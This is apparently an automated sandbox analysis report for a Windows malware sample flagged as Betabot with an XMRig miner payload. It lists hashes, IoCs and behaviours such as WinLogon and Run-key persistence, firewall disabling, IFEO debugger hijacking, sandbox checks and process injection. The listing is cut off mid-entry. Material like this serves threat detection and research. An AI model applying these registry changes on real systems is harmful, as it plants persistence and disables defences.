Analysis
-
max time kernel
154s -
max time network
184s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
07-07-2022 23:58
Static task
static1
Behavioral task
behavioral1
Sample
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
Resource
win7-20220414-en
General
-
Target
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
-
Size
2.1MB
-
MD5
65c47159ad930504229825ef323aecf8
-
SHA1
26974a01d0815a6f5cc63b34527a1a6a91ba2705
-
SHA256
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
-
SHA512
d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\e7c7efc\\colorcpl.exe" msiexec.exe -
Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe -
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
-
XMRig Miner payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp xmrig behavioral1/memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp xmrig behavioral1/memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp xmrig -
Sets file execution options in registry 2 TTPs 4 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exeexplorer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe\DisableExceptionChainValidation 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ltjufqn.exe" explorer.exe -
Processes:
resource yara_rule behavioral1/memory/1180-75-0x0000000000400000-0x00000000004DA000-memory.dmp upx behavioral1/memory/1180-77-0x0000000000400000-0x00000000004DA000-memory.dmp upx behavioral1/memory/1180-79-0x0000000000400000-0x00000000004DA000-memory.dmp upx behavioral1/memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp upx behavioral1/memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp upx behavioral1/memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe -
Drops startup file 1 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
explorer.exemsiexec.exe43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" msiexec.exe Key created \Registry\User\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\"" 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe -
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum msiexec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exeexplorer.exemsiexec.exepid process 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 568 explorer.exe 568 explorer.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exedescription pid process target process PID 940 set thread context of 1180 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe notepad.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exeexplorer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exemsiexec.exeexplorer.exepid process 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 568 explorer.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 568 explorer.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 568 explorer.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 940 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe 560 msiexec.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exeexplorer.exepid process 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe 568 explorer.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exepid process 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
notepad.exe43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exeexplorer.exedescription pid process Token: SeLockMemoryPrivilege 1180 notepad.exe Token: SeDebugPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeRestorePrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeBackupPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeLoadDriverPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeCreatePagefilePrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeShutdownPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeTakeOwnershipPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeChangeNotifyPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeCreateTokenPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeMachineAccountPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeSecurityPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeAssignPrimaryTokenPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeCreateGlobalPrivilege 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: 33 1484 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeDebugPrivilege 1400 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe Token: SeLockMemoryPrivilege 1180 notepad.exe Token: SeDebugPrivilege 568 explorer.exe Token: SeRestorePrivilege 568 explorer.exe Token: SeBackupPrivilege 568 explorer.exe Token: SeLoadDriverPrivilege 568 explorer.exe Token: SeCreatePagefilePrivilege 568 explorer.exe Token: SeShutdownPrivilege 568 explorer.exe Token: SeTakeOwnershipPrivilege 568 explorer.exe Token: SeChangeNotifyPrivilege 568 explorer.exe Token: SeCreateTokenPrivilege 568 explorer.exe Token: SeMachineAccountPrivilege 568 explorer.exe Token: SeSecurityPrivilege 568 explorer.exe Token: SeAssignPrimaryTokenPrivilege 568 explorer.exe Token: SeCreateGlobalPrivilege 568 explorer.exe Token: 33 568 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exepid process 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exedescription pid process target process PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1484 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 940 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 